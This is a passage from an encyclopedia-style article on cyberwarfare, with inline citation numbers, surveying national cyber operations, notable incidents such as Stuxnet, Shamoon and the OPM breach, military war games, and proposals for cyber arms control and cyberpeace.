military headquarters, air defense networks and weapons systems that require computers to operate. 
76 One cyber warfare scenario, Cyber-ShockWave, which was wargamed on the cabinet level by former administration officials, raised issues ranging from the National Guard to the power grid to the limits of statutory authority. 77 78 79 80 The distributed nature of internet based attacks means that it is difficult to determine motivation and attacking party, meaning that it is unclear when a specific act should be considered an act of war. 81 Examples of cyberwarfare driven by political motivations can be found worldwide. In 2008, Russia began a cyber attack on the Georgian government website, which was carried out along with Georgian military operations in South Ossetia. In 2008, Chinese "nationalist hackers" attacked CNN as it reported on Chinese repression on Tibet. 82 Hackers from Armenia and Azerbaijan have actively participated in cyberwarfare as part of the Nagorno-Karabakh conflict, with Azerbaijani hackers targeting Armenian websites and posting Ilham Aliyev's statements. 83 84 Jobs in cyberwarfare have become increasingly popular in the military. All four branches of the United States military actively recruit for cyber warfare positions. 85 Potential targets in internet sabotage include all aspects of the Internet from the backbones of the web, to the internet service providers, to the varying types of data communication mediums and network equipment. This would include: web servers, enterprise information systems, client server systems, communication links, network equipment, and the desktops and laptops in businesses and homes. Electrical grids, financial networks, and telecommunication systems are also deemed vulnerable, especially due to current trends in computerization and automation. 86 Politically motivated hacktivism involves the subversive use of computers and computer networks to promote an agenda, and can potentially extend to attacks, theft and virtual sabotage that could be seen as cyberwarfare or mistaken for it. 87 Hacktivists use their knowledge and software tools to gain unauthorized access to computer systems they seek to manipulate or damage not for material gain or to cause widespread destruction, but to draw attention to their cause through well-publicized disruptions of select targets. Anonymous and other hacktivist groups are often portrayed in the media as cyber-terrorists, wreaking havoc by hacking websites, posting sensitive information about their victims, and threatening further attacks if their demands are not met. However, hacktivism is more than that. Actors are politically motivated to change the world, through the use of fundamentalism. Groups like Anonymous, however, have divided opinion with their methods. 88 Cyber attacks, including ransomware, can be used to generate income. States can use these techniques to generate significant sources of income, which can evade sanctions and perhaps while simultaneously harming adversaries (depending on targets). This tactic was observed in August 2019 when it was revealed North Korea had generated $2 billion to fund its weapons program, avoiding the blanket of sanctions levied by the United States, United Nations and the European Union. 89 90 Computer hacking represents a modern threat in ongoing global conflicts and industrial espionage and as such is presumed to widely occur. 86 It is typical that this type of crime is underreported to the extent they are known. According to McAfee's George Kurtz, corporations around the world face millions of cyberattacks a day. 
"Most of these attacks don't gain any media attention or lead to strong political statements by victims. 91 This type of crime is usually financially motivated. 92 But not all those who engage in cyberwarfare do so for financial or ideological reasons. There are institutes and companies like the University of Cincinnati 93 or the Kaspersky Security Lab which engage in cyberwarfare so as to better understand the field through actions like the researching and publishing of new security threats. 94 A number of countries conduct exercise to increase preparedness and explore the strategy, tactics and operations involved in conducting and defending against cyber attacks against hostile states, this is typically done in the form of war games. 95 The Cooperative Cyber Defence Centre of Excellence (CCDCE), part of the North Atlantic Treaty Organization (NATO), have conducted a yearly war game called Locked Shields since 2010 designed to test readiness and improve skills, strategy tactics and operational decision making of participating national organizations. 96 97 Locked Shields 2019 saw 1200 participants from 30 countries compete in a red team vs. blue team exercise. The war game involved a fictional country, Berylia, which was "experiencing a deteriorating security situation, where a number of hostile events coincide with coordinated cyber attacks against a major civilian internet service provider and maritime surveillance system. The attacks caused severe disruptions in the power generation and distribution, 4G communication systems, maritime surveillance, water purification plant and other critical infrastructure components". CCDCE describe the aim of the exercise was to "maintain the operation of various systems under intense pressure, the strategic part addresses the capability to understand the impact of decisions made at the strategic and policy level. 96 98 Ultimately, France was the winner of Locked Shields 2019. 99 The European Union conducts cyber war game scenarios with member states and foreign partner states to improve readiness, skills and observe how strategic and tactical decisions may affect the scenario. 100 As well as war games which serve a broader purpose to explore options and improve skills, cyber war games are targeted at preparing for specific threats. In 2018 the Sunday Times reported the UK government was conducting cyber war games which could "blackout Moscow". 101 102 These types of war games move beyond defensive preparedness, as previously described above and onto preparing offensive capabilities which can be used as deterrence, or for "war". 103 Approximately 120 countries have been developing ways to use the Internet as a weapon and target financial markets, government computer systems and utilities. 104 According to Fritz, China has expanded its cyber capabilities and military technology by acquiring foreign military technology. 105 Fritz states that the Chinese government uses "new space-based surveillance and intelligence gathering systems, Anti-satellite weapon, anti-radar, infrared decoys, and false target generators" to assist in this quest, and that they support their "Informatisation" of their military through "increased education of soldiers in cyber warfare; improving the information network for military training, and has built more virtual laboratories, digital libraries and digital campuses. 105 Through this informatisation, they hope to prepare their forces to engage in a different kind of warfare, against technically capable adversaries. 
106 Foreign Policy magazine put the size of China's "hacker army" at anywhere from 50,000 to 100,000 individuals. 107 Diplomatic cables highlight US concerns that China is using access to Microsoft source code and 'harvesting the talents of its private sector' to boost its offensive and defensive capabilities. 108 While China continues to be held responsible for a string of cyber-attacks on a number of public and private institutions in the United States, India, Russia, Canada, and France, the Chinese government denies any involvement in cyber-spying campaigns. The administration maintains the position that China is also victim to an increasing number of cyber-attacks. Most reports about China's cyber warfare capabilities have yet to be confirmed by the Chinese government. 109 In June 2015, the United States Office of Personnel Management (OPM) announced that it had been the target of a data breach targeting the records of as many as four million people. 110 Later, FBI Director James Comey put the number at 18 million. 111 The Washington Post has reported that the attack originated in China, citing unnamed government officials. 112 Operation Shady RAT is a series of cyber attacks starting mid 2006, reported by Internet security company McAfee in August 2011. China is widely believed to be the state actor behind these attacks which hit at least 72 organizations including governments and defense contractors. 113 The 2018 cyberattack on the Marriott hotel chain 114 115 that collected personal details of roughly 500 million guests is now known to be a part of a Chinese intelligence-gathering effort that also hacked health insurers and the security clearance files of millions more Americans, The hackers, are suspected of working on behalf of the Ministry of State Security (MSS), the country's Communist-controlled civilian spy agency. 116 117 118 On 14 September 2020, a database showing personal details of about 2.4 million people around the world was leaked and published. A Chinese company, Zhenhua Data compiled the database. 119 According to the information from "National Enterprise Credit Information Publicity System", which is run by State Administration for Market Regulation in China, the shareholders of Zhenhua Data Information Technology Co., Ltd. are two natural persons and one general partnership enterprise whose partners are natural persons. 120 Wang Xuefeng, who is the chief executive and the shareholder of Zhenhua Data, has publicly boasted that he supports "hybrid warfare" through manipulation of public opinion and "psychological warfare". 121 In February 2024 The Philippines announced that it had successfully fought off a cyber attack which was traced to hackers in China. Several government websites were targeted including the National coast watch and personal website of the president of the Philippines, Ferdinand Marcos Jr. 122 In May 2024 The UK announced that it had taken a database offline that is used by its defense ministry after coming under a cyber attack attributed to the Chinese state. 123 The Department of Information Technology created the Indian Computer Emergency Response Team (CERT-In) in 2004 to thwart cyber attacks in India. 124 That year, there were 23 reported cyber security breaches. In 2011, there were 13,301. That year, the government created a new subdivision, the National Critical Information Infrastructure Protection Centre (NCIIPC) to thwart attacks against energy, transport, banking, telecom, defense, space and other sensitive areas. 
125 The executive director of the Nuclear Power Corporation of India (NPCIL) stated in February 2013 that his company alone was forced to block up to ten targeted attacks a day. CERT-In was left to protect less critical sectors. 126 A high-profile cyber attack on 12 July 2012 breached the email accounts of about 12,000 people, including those of officials from the Ministry of External Affairs, Ministry of Home Affairs, Defense Research and Development Organizations (DRDO), and the Indo-Tibetan Border Police (ITBP). 124 A government-private sector plan overseen by National Security Advisor (NSA) Shivshankar Menon began in October 2012 and intends to boost India's cyber security capabilities in light of an expert group's findings that India faces a shortfall of 470,000 such experts despite the country's reputation as an IT and software powerhouse. 127 In February 2013, Information Technology Secretary J. Satyanarayana stated that the NCIIPC was finalizing policies related to national cyber security that would focus on domestic security solutions, reducing exposure through foreign technology. 124 Other steps include the isolation of various security agencies to ensure that a synchronised attack could not succeed on all fronts and the planned appointment of a National Cyber Security Coordinator. As of that month, there had been no significant economic or physical damage to India related to cyber attacks. On 26 November 2010, a group calling itself the Indian Cyber Army hacked websites belonging to the Pakistan Army and others belonging to different ministries, including the Ministry of Foreign Affairs, Ministry of Education, Ministry of Finance, Pakistan Computer Bureau, Council of Islamic Ideology, etc. The attack was carried out as revenge for the Mumbai terrorist attacks. 128 On 4 December 2010, a group calling itself the Pakistan Cyber Army hacked the website of India's top investigating agency, the Central Bureau of Investigation (CBI). The National Informatics Center (NIC) has begun an inquiry. 129 In July 2016, Cymmetria researchers discovered and revealed the cyber attack dubbed 'Patchwork', which compromised an estimated 2,500 corporate and government agencies using code stolen from GitHub and the dark web. Examples of weapons used are an exploit for the Sandworm vulnerability (CVE-2014-4114), a compiled AutoIt script, and UAC bypass code dubbed UACME. Targets are believed to be mainly military and political assignments around Southeast Asia and the South China Sea, and the attackers are believed to be of Indian origin and gathering intelligence from influential parties. 130 131 The Defence Cyber Agency, which is the Indian military agency responsible for cyberwarfare, is expected to become operational by November 2019. 132 China was blamed after the cybersecurity company F-Secure Labs found malware, NanHaiShu, which targeted the Philippines Department of Justice. It sent information from an infected machine to a server with a Chinese IP address. The malware, which is considered particularly sophisticated in nature, was introduced by phishing emails designed to look like they were coming from authentic sources. The information sent is believed to relate to the South China Sea legal case. 133 In July 2009, there was a series of coordinated denial-of-service attacks against major government, news media, and financial websites in South Korea and the United States. 
134 While many thought the attack was directed by North Korea, one researcher traced the attacks to the United Kingdom. 135 Security researcher Chris Kubecka presented evidence that multiple European Union and United Kingdom companies unwittingly helped attack South Korea due to W32.Dozer infections, malware used in part of the attack. Some of the companies used in the attack were partially owned by several governments, further complicating cyber attribution. 136 In July 2011, the South Korean company SK Communications was hacked, resulting in the theft of the personal details (including names, phone numbers, home and email addresses and resident registration numbers) of up to 35 million people. A trojaned software update was used to gain access to the SK Communications network. Links exist between this hack and other malicious activity, and it is believed to be part of a broader, concerted hacking effort. 137 With ongoing tensions on the Korean Peninsula, South Korea's defense ministry stated that South Korea was going to improve its cyber-defense strategies in hopes of preparing itself against possible cyber attacks. In March 2013, South Korea's major banks (Shinhan Bank, Woori Bank and NongHyup Bank) as well as several broadcasting stations (KBS, YTN and MBC) were hacked and more than 30,000 computers were affected; it is one of the biggest attacks South Korea has faced in years. 138 Although it remains uncertain who was involved in this incident, there were immediate assertions that North Korea was connected, as it had threatened to attack South Korea's government institutions, major national banks and traditional newspapers numerous times in reaction to the sanctions it received over nuclear testing and to the continuation of Foal Eagle, South Korea's annual joint military exercise with the United States. North Korea's cyber warfare capabilities raise the alarm for South Korea, as North Korea is increasing its manpower through military academies specializing in hacking. Current figures state that South Korea has only 400 specialized personnel, while North Korea has more than 3,000 highly trained hackers; this portrays a huge gap in cyber warfare capabilities and sends a message to South Korea that it has to step up and strengthen its Cyber Warfare Command forces. Therefore, in order to be prepared for future attacks, South Korea and the United States agreed to discuss deterrence plans further at the Security Consultative Meeting (SCM). At the SCM, they plan to develop strategies that focus on accelerating the deployment of ballistic missiles as well as fostering the defense shield program known as the Korean Air and Missile Defense. 139 In an extension of a bilateral dispute between Ethiopia and Egypt over the Grand Ethiopian Renaissance Dam, Ethiopian government websites were hacked by Egypt-based hackers in June 2020. 140 141 The New York Times published an exposé revealing an extensive three-year phishing campaign aimed at diplomats based in Cyprus. After accessing the state system, the hackers had access to the European Union's entire exchange database. 142 By logging into Coreu, hackers accessed communications linking all EU states, on both sensitive and less sensitive matters. The event exposed poor protection of routine exchanges among European Union officials and a coordinated effort from a foreign entity to spy on another country.
"After over a decade of experience countering Chinese cyberoperations and extensive technical analysis, there is no doubt this campaign is connected to the Chinese government", said Blake Darche, one of the experts at Area 1 Security, the company that revealed the stolen documents. The Chinese Embassy in the US did not return calls for comment. 143 In 2019, another coordinated effort took place that allowed hackers to gain access to government (gov.cy) emails. Cisco's Talos Security Department revealed that "Sea Turtle" hackers carried out a broad piracy campaign in the DNS countries, hitting 40 different organizations, including Cyprus. 144 In April 2007, Estonia came under cyber attack in the wake of the relocation of the Bronze Soldier of Tallinn. 145 Most of the attacks came from Russia and from official servers of the Russian authorities. 146 In the attack, ministries, banks, and media were targeted. 147 148 This attack on Estonia, a seemingly small Baltic state, was so effective because most of Estonia's government services are run online. Estonia has implemented an e-government, where banking services, political elections, taxes, and other components of a modern society are now all done online. 149 In 2013, the French Minister of Defense, Jean-Yves Le Drian, ordered the creation of a cyber army, representing France's fourth national army corps 150 (along with the ground, naval and air forces), under the French Ministry of Defense, to protect French and European interests at home and abroad. 151 A contract was made with the French firm EADS (Airbus) to identify and secure its main elements susceptible to cyber threats. 152 In 2016, France planned 2,600 "cyber-soldiers" and a 440 million euro investment in cybersecurity products for this new army corps. 153 An additional 4,400 reservists have constituted the heart of this army since 2019. 154 In 2013, Germany revealed the existence of its 60-person Computer Network Operation unit. 155 The German intelligence agency, the BND, announced it was seeking to hire 130 "hackers" for a new "cyber defence station" unit. In March 2013, BND president Gerhard Schindler announced that his agency had observed up to five attacks a day on government authorities, thought mainly to originate in China. He confirmed the attackers had so far only accessed data and expressed concern that the stolen information could be used as the basis of future sabotage attacks against arms manufacturers, telecommunications companies and government and military agencies. 156 Shortly after Edward Snowden leaked details of the U.S. National Security Agency's cyber surveillance system, German Interior Minister Hans-Peter Friedrich announced that the BND would be given an additional budget of 100 million euros to increase its cyber surveillance capability from 5% of total internet traffic in Germany to 20% of total traffic, the maximum amount allowed by German law. 157 In the Netherlands, cyber defense is nationally coordinated by the National Cyber Security Centrum (NCSC). 158 The Dutch Ministry of Defense laid out a cyber strategy in 2011. 159 The first focus is to improve the cyber defense handled by the Joint IT branch (JIVC). To improve intel operations, the intel community in the Netherlands (including the military intel organization, MIVD) has set up the Joint Sigint Cyber Unit (JSCU). The Ministry of Defense also oversees an offensive cyber force, called Defensive Cyber Command (DCC).
160 It has been claimed that Russian security services organized a number of denial of service attacks as a part of their cyber-warfare against other countries, 161 most notably the 2007 cyberattacks on Estonia and the 2008 cyberattacks on Russia, South Ossetia, Georgia, and Azerbaijan. 162 One identified young Russian hacker said that he was paid by Russian state security services to lead hacking attacks on NATO computers. He was studying computer science at the Department of the Defense of Information, and his tuition was paid for by the FSB. 163 Russian, South Ossetian, Georgian and Azerbaijani sites were attacked by hackers during the 2008 South Ossetia War. 164 In October 2016, Jeh Johnson, the United States Secretary of Homeland Security, and James Clapper, the U.S. Director of National Intelligence, issued a joint statement accusing Russia of interfering with the 2016 United States presidential election. 165 The New York Times reported that the Obama administration had formally accused Russia of stealing and disclosing Democratic National Committee emails. 166 Under U.S. law (Title 50 of the U.S. Code, War and National Defense, Chapter 15, National Security, Subchapter III, Accountability for Intelligence Activities 167 ), there must be a formal Presidential finding prior to authorizing a covert attack. Then-U.S. Vice President Joe Biden said on the American news interview program Meet the Press that the United States would respond. 168 The New York Times noted that Biden's comment "seems to suggest that Mr. Obama is prepared to order or has already ordered some kind of covert action". 169 In January 2017, Sweden's armed forces were subjected to a cyber-attack that caused them to shut down a so-called Caxcis IT system used in military exercises. 170 According to CrowdStrike, from 2014 to 2016 the Russian APT Fancy Bear used Android malware to target the Ukrainian Army's Rocket Forces and Artillery. They distributed an infected version of an Android app whose original purpose was to control targeting data for the D-30 howitzer artillery. The app, used by Ukrainian officers, was loaded with the X-Agent spyware and posted online on military forums. The attack was claimed by CrowdStrike to be successful, with more than 80% of Ukrainian D-30 howitzers destroyed, the highest percentage loss of any artillery pieces in the army (a percentage that had never been previously reported and would mean the loss of nearly the entire arsenal of the biggest artillery piece of the Ukrainian Armed Forces 171 ). 172 According to the Ukrainian army, this number is incorrect: losses in artillery weapons "were way below those reported" and "have nothing to do with the stated cause". 173 In 2014, the Russians were suspected of using a cyber weapon called "Snake", or "Ouroboros", to conduct a cyber attack on Ukraine during a period of political turmoil. The Snake tool kit began spreading into Ukrainian computer systems in 2010. It performed Computer Network Exploitation (CNE), as well as highly sophisticated Computer Network Attacks (CNA). 174 On 23 December 2015, the BlackEnergy malware was used in a cyberattack on Ukraine's power grid that left more than 200,000 people temporarily without power. A mining company and a large railway operator were also victims of the attack. 175 Ukraine saw a massive surge in cyber attacks during the 2022 Russian invasion of Ukraine. Several websites belonging to Ukrainian banks and government departments became inaccessible.
176 MI6 reportedly infiltrated an Al Qaeda website and replaced the instructions for making a pipe bomb with a recipe for making cupcakes. 177 In October 2010, Iain Lobban, the director of the Government Communications Headquarters (GCHQ), said the UK faced a "real and credible" threat from cyber attacks by hostile states and criminals, that government systems were targeted 1,000 times each month, that such attacks threatened the UK's economic future, and that some countries were already using cyber assaults to put pressure on other nations. 178 On 12 November 2013, financial organizations in London conducted cyber war games dubbed "Waking Shark 2" 179 to simulate massive internet-based attacks against banks and other financial organizations. The Waking Shark 2 cyber war games followed a similar exercise on Wall Street. 180 Iran has been both a victim and a perpetrator of several cyberwarfare operations. Iran is considered an emerging military power in the field. 181 In September 2010, Iran was attacked by the Stuxnet worm, thought to specifically target its Natanz nuclear enrichment facility. It was a 500-kilobyte computer worm that infected at least 14 industrial sites in Iran, including the Natanz uranium-enrichment plant. Although the authors of Stuxnet have not been officially identified, it is believed to have been developed and deployed by the United States and Israel. 182 The worm is said to be the most advanced piece of malware ever discovered, and it significantly raised the profile of cyberwarfare. 183 184 The Iranian Cyber Police department, FATA, was dismissed one year after its creation in 2011 because of the arrest and death of Sattar Beheshti, a blogger, in FATA custody. Since then, the main institution responsible for cyberwarfare in Iran has been the "Cyber Defense Command", operating under the Joint Staff of the Iranian Armed Forces. The Iranian state-sponsored group MuddyWater has been active since at least 2017 and is responsible for many cyber attacks on various sectors. 185 Israel alleges that cyber-warfare was part of the 2006 war against Hezbollah; Israel Defense Forces (IDF) intelligence estimates that several countries in the Middle East used Russian hackers and scientists to operate on their behalf. As a result, Israel attached growing importance to cyber-tactics, and became, along with the U.S., France and a couple of other nations, involved in cyber-war planning. Many international high-tech companies are now locating research and development operations in Israel, where local hires are often veterans of the IDF's elite computer units. 186 Richard A. Clarke adds that "our Israeli friends have learned a thing or two from the programs we have been working on for more than two decades". 14 : 8 In September 2007, Israel carried out an airstrike on a suspected nuclear reactor 187 in Syria, dubbed Operation Orchard. U.S. industry and military sources speculated that the Israelis may have used cyberwarfare to allow their planes to pass undetected by radar into Syria. 188 189 Following US President Donald Trump's decision to pull out of the Iran nuclear deal in May 2018, cyber warfare units in the United States and Israel monitoring internet traffic out of Iran noted a surge in retaliatory cyber attacks from Iran. Security firms warned that Iranian hackers were sending emails containing malware to diplomats who work in the foreign affairs offices of US allies and employees at telecommunications companies, trying to infiltrate their computer systems.
190 On 15 August 2012 at 11:08 am local time, the Shamoon virus began destroying over 35,000 computer systems, rendering them inoperable. The virus was used to target the Saudi government by causing destruction at the state-owned national oil company Saudi Aramco. The attackers posted a pastie on PasteBin.com hours before the wiper logic bomb triggered, citing oppression and the Al-Saud regime as a reason behind the attack. 191 The attack was well staged, according to Chris Kubecka, a former security advisor to Saudi Aramco after the attack and group leader of security for Aramco Overseas. 192 It was an unnamed Saudi Aramco employee on the Information Technology team who opened a malicious phishing email, allowing initial entry into the computer network in mid-2012. 193 Kubecka also detailed in her Black Hat USA talk that Saudi Aramco had placed the majority of its security budget on the ICS control network, leaving the business network at risk of a major incident: "When you realize most of your security budget was spent on ICS & IT gets Pwnd". 193 The virus has been noted to have behavior differing from other malware attacks, due to the destructive nature and the cost of the attack and recovery. US Defense Secretary Leon Panetta called the attack a "Cyber Pearl Harbor". 194 It became known years later as the "biggest hack in history" and was intended for cyber warfare. 195 Shamoon can spread from an infected machine to other computers on the network. Once a system is infected, the virus continues to compile a list of files from specific locations on the system, upload them to the attacker, and erase them. Finally, the virus overwrites the master boot record of the infected computer, making it unusable. 196 197 The virus has been used for cyber warfare against the national oil companies Saudi Aramco and Qatar's RasGas. 198 199 196 200 Saudi Aramco announced the attack on its Facebook page and went offline again until a company statement was issued on 25 August 2012. The statement falsely reported that normal business had resumed on 25 August 2012. However, a Middle Eastern journalist leaked photographs taken on 1 September 2012 showing kilometers of petrol trucks that could not be loaded because the business systems were still inoperable. On 29 August 2012, the same attackers behind Shamoon posted another pastie on PasteBin.com, taunting Saudi Aramco with proof that they still retained access to the company network. The post contained usernames and passwords for security and network equipment and the new password for the CEO, Khalid Al-Falih. 201 The attackers also referenced a portion of the Shamoon malware as further proof in the pastie. 202 According to Kubecka, in order to restore operations, Saudi Aramco used its large private fleet of aircraft and available funds to purchase much of the world's hard drives, driving the price up. New hard drives were required as quickly as possible so that oil prices were not affected by speculation. By 1 September 2012, 17 days after the 15 August attack, gasoline resources were dwindling for the public of Saudi Arabia. RasGas was also affected by a different variant, which crippled it in a similar manner. 203 In March 2018, American Republican fundraiser Elliott Broidy filed a lawsuit against Qatar, alleging that Qatar's government stole and leaked his emails in order to discredit him because he was viewed "as an impediment to their plan to improve the country's standing in Washington".
204 In May 2018, the lawsuit named Mohammed bin Hamad bin Khalifa Al Thani, brother of the Emir of Qatar, and his associate Ahmed Al-Rumaihi as allegedly orchestrating Qatar's cyber warfare campaign against Broidy. 205 Further litigation revealed that the same cybercriminals who targeted Broidy had targeted as many as 1,200 other individuals, some of whom are also "well-known enemies of Qatar", such as senior officials of the U.A.E., Egypt, Saudi Arabia, and Bahrain. While these hackers almost always obscured their location, some of their activity was traced to a telecommunication network in Qatar. 206 The United Arab Emirates has launched several cyber-attacks in the past targeting dissidents. Ahmed Mansoor, an Emirati citizen, was jailed for sharing his thoughts on Facebook and Twitter. 207 He was given the code name Egret under the state-led covert project called Raven, which spied on top political opponents, dissidents, and journalists. Project Raven deployed a secret hacking tool called Karma to spy without requiring the target to engage with any web links. 208 In September 2021, three former American intelligence officers, Marc Baier, Ryan Adams, and Daniel Gericke, admitted to assisting the UAE in hacking crimes by providing it with advanced technology, in violation of US law. Under a three-year deferred prosecution agreement with the Justice Department, the three defendants also agreed to pay nearly $1.7 million in fines to avoid prison sentences. The court documents revealed that the Emirates hacked into the computers and mobile phones of dissidents, activists, and journalists. They also attempted to break into systems in the US and the rest of the world. 209 Cyberwarfare in the United States is a part of the American military strategy of proactive cyber defence and the use of cyberwarfare as a platform for attack. 210 The new United States military strategy makes explicit that a cyberattack is a casus belli just as a traditional act of war is. 211 U.S. government security expert Richard A. Clarke, in his book Cyber War (May 2010), defined "cyberwarfare" as "actions by a nation-state to penetrate another nation's computers or networks for the purposes of causing damage or disruption". 14 : 6 The Economist describes cyberspace as "the fifth domain of warfare", 212 and William J. Lynn, U.S. Deputy Secretary of Defense, states that "as a doctrinal matter, the Pentagon has formally recognized cyberspace as a new domain in warfare . . . which has become just as critical to military operations as land, sea, air, and space". 213 When Russia was still a part of the Soviet Union in 1982, a portion of a Trans-Siberian pipeline within its territory exploded, 214 allegedly due to Trojan horse computer malware implanted in pirated Canadian software by the Central Intelligence Agency. The malware caused the SCADA system running the pipeline to malfunction. The "Farewell Dossier" provided information on this attack and noted that compromised computer chips would become a part of Soviet military equipment, flawed turbines would be placed in the gas pipeline, and defective plans would disrupt the output of chemical plants and a tractor factory. This caused the "most monumental nonnuclear explosion and fire ever seen from space". However, the Soviet Union did not blame the United States for the attack. 215 In 2009, President Barack Obama declared America's digital infrastructure to be a "strategic national asset", and in May 2010 the Pentagon set up its new U.S.
Cyber Command (USCYBERCOM), headed by General Keith B. Alexander, director of the National Security Agency (NSA), to defend American military networks and attack other countries' systems. The EU has set up ENISA (European Union Agency for Network and Information Security), which is headed by Prof. Udo Helmbrecht, and there are now further plans to significantly expand ENISA's capabilities. The United Kingdom has also set up a cyber-security and "operations centre" based in Government Communications Headquarters (GCHQ), the British equivalent of the NSA. In the U.S., however, Cyber Command is only set up to protect the military, whereas government and corporate infrastructures are primarily the responsibility of the Department of Homeland Security and private companies, respectively. 212 On 19 June 2010, United States Senator Joe Lieberman (I-CT) introduced a bill called the "Protecting Cyberspace as a National Asset Act of 2010", 216 which he co-wrote with Senator Susan Collins (R-ME) and Senator Thomas Carper (D-DE). If signed into law, this controversial bill, which the American media dubbed the "Kill switch bill", would grant the president emergency powers over parts of the Internet. However, all three co-authors of the bill issued a statement that, instead, the bill "narrowed existing broad presidential authority to take over telecommunications networks". 217 In August 2010, the U.S. for the first time warned publicly about the Chinese military's use of civilian computer experts in clandestine cyber attacks aimed at American companies and government agencies. The Pentagon also pointed to an alleged China-based computer spying network dubbed GhostNet, which was revealed in a 2009 research report. 218 219 On 6 October 2011, it was announced that Creech AFB's drone and Predator fleet's command and control data stream had been keylogged for the previous two weeks, resisting all attempts to reverse the exploit. 220 The Air Force issued a statement that the virus had "posed no threat to our operational mission". 221 On 21 November 2011, it was widely reported in the U.S. media that a hacker had destroyed a water pump at the Curran-Gardner Township Public Water District in Illinois. 222 However, it later turned out that this information was not only false, but had been inappropriately leaked from the Illinois Statewide Terrorism and Intelligence Center. 223 In June 2012, The New York Times reported that President Obama had ordered the cyber attack on Iranian nuclear enrichment facilities. 224 In August 2012, USA Today reported that the US had conducted cyberattacks for tactical advantage in Afghanistan. 225 According to a 2013 Foreign Policy magazine article, the NSA's Tailored Access Operations (TAO) unit "has successfully penetrated Chinese computer and telecommunications systems for almost 15 years, generating some of the best and most reliable intelligence information about what is going on inside the People's Republic of China". 226 227 In 2014, Barack Obama ordered an intensification of cyberwarfare against North Korea's missile program, aimed at sabotaging test launches in their opening seconds. 228 On 24 November 2014, the Sony Pictures Entertainment hack resulted in the release of confidential data belonging to Sony Pictures Entertainment (SPE). In 2016, President Barack Obama authorized the planting of cyber weapons in Russian infrastructure in the final weeks of his presidency in response to Moscow's interference in the 2016 presidential election.
229 On 29 December 2016, the United States imposed the most extensive sanctions against Russia since the Cold War, 230 expelling 35 Russian diplomats from the United States. 231 232 Economic sanctions are among the most frequently used foreign policy instruments by the United States today. 233 Thus, it is not surprising that economic sanctions are also used as counter-policies against cyberattacks. According to Onder (2021), economic sanctions are also information-gathering mechanisms for the sanctioning states about the capabilities of the sanctioned states. 234 In March 2017, WikiLeaks published more than 8,000 documents on the CIA. The confidential documents, codenamed Vault 7 and dated from 2013 to 2016, include details on the CIA's software capabilities, such as the ability to compromise cars, smart TVs, 235 web browsers (including Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera Software ASA), 236 237 238 and the operating systems of most smartphones (including Apple's iOS and Google's Android), as well as other operating systems such as Microsoft Windows, macOS, and Linux. 239 In June 2019, The New York Times reported that American hackers from the United States Cyber Command had planted malware potentially capable of disrupting the Russian electrical grid. 61 The United States topped the world in terms of cyberwarfare intent and capability, according to Harvard University's Belfer Center 2022 Cyber Power Index, above China, Russia, the United Kingdom and Australia. 240 In June 2023, the National Security Agency and Apple were accused by the Russian Federal Security Service (FSB) of compromising thousands of iPhones, including those of diplomats from China, Israel, NATO members, and Syria. Kaspersky Lab said many of its senior staff and managers were also hit by the ongoing attack, which it first suspected in early 2023. The oldest traces of infiltration date back to 2019. Kaspersky Lab said it had not shared the findings with Russian authorities until the FSB announcement. 240 A cyber mercenary is a non-state actor that carries out cyber attacks for nation-states for hire. State actors can use cyber mercenaries as a front to try to distance themselves from an attack with plausible deniability. 241 The rise of cyber as a warfighting domain has led to efforts to determine how cyberspace can be used to foster peace. For example, the German civil rights panel FIfF runs a campaign for cyberpeace, for the control of cyberweapons and surveillance technology and against the militarization of cyberspace and the development and stockpiling of offensive exploits and malware. 242 Measures for cyberpeace include policymakers developing new rules and norms for warfare; individuals and organizations building new tools and secure infrastructures; promoting open source; the establishment of cyber security centers; auditing of critical infrastructure cybersecurity; obligations to disclose vulnerabilities; disarmament; defensive security strategies; decentralization; education; and widely applying relevant tools and infrastructures, encryption and other cyberdefenses. 242 243 The topics of cyber peacekeeping 244 245 and cyber peacemaking 246 have also been studied by researchers, as a way to restore and strengthen peace in the aftermath of both cyber and traditional warfare.
247 Cyber counter-intelligence comprises measures to identify, penetrate, or neutralize foreign operations that use cyber means as the primary tradecraft methodology, as well as foreign intelligence service collection efforts that use traditional methods to gauge cyber capabilities and intentions. 248 One of the hardest issues in cyber counterintelligence is the problem of cyber attribution. Unlike in conventional warfare, figuring out who is behind an attack can be very difficult. 255 In October 2011, the Journal of Strategic Studies, a leading journal in that field, published an article by Thomas Rid, "Cyber War Will Not Take Place", which argued that all politically motivated cyber attacks are merely sophisticated versions of sabotage, espionage, or subversion, and that it is unlikely that cyber war will occur in the future. 256 The NIST Cybersecurity Framework was published in 2014 in the US. 257 The Tallinn Manual, published in 2013, is an academic, non-binding study on how international law, in particular the jus ad bellum and international humanitarian law, applies to cyber conflicts and cyber warfare. It was written at the invitation of the Tallinn-based NATO Cooperative Cyber Defence Centre of Excellence by an international group of approximately twenty experts between 2009 and 2012. 258 The Shanghai Cooperation Organisation (whose members include China and Russia) defines cyberwar to include dissemination of information "harmful to the spiritual, moral and cultural spheres of other states". In September 2011, these countries proposed to the UN Secretary General a document called "International code of conduct for information security". 259 In contrast, the United States' approach focuses on physical and economic damage and injury, putting political concerns under freedom of speech. This difference of opinion has led to reluctance in the West to pursue global cyber arms control agreements. 260 However, American General Keith B. Alexander did endorse talks with Russia over a proposal to limit military attacks in cyberspace. 261 In June 2013, Barack Obama and Vladimir Putin agreed to install a secure cyberwar hotline providing "a direct secure voice communications line between the US cybersecurity coordinator and the Russian deputy secretary of the security council, should there be a need to directly manage a crisis situation arising from an ICT security incident" (White House quote). 262 A Ukrainian international law scholar, Alexander Merezhko, has developed a project called the International Convention on Prohibition of Cyberwar in Internet. According to this project, cyberwar is defined as the use of the Internet and related technological means by one state against the political, economic, technological and information sovereignty and independence of another state. Professor Merezhko's project suggests that the Internet ought to remain free from warfare tactics and be treated as an international landmark. He states that the Internet (cyberspace) is a "common heritage of mankind". 263 At the February 2017 RSA Conference, Microsoft president Brad Smith suggested global rules, a "Digital Geneva Convention", for cyber attacks that would "ban the nation-state hacking of all the civilian aspects of our economic and political infrastructures". He also stated that an independent organization could investigate and publicly disclose evidence that attributes nation-state attacks to specific countries.
Furthermore, he said that the technology sector should collectively and neutrally work together to protect Internet users, pledge to remain neutral in conflict and not aid governments in offensive activity, and adopt a coordinated disclosure process for software and hardware vulnerabilities. 264 265 A fact-finding body has also been proposed to regulate cyber operations. 266 267 |
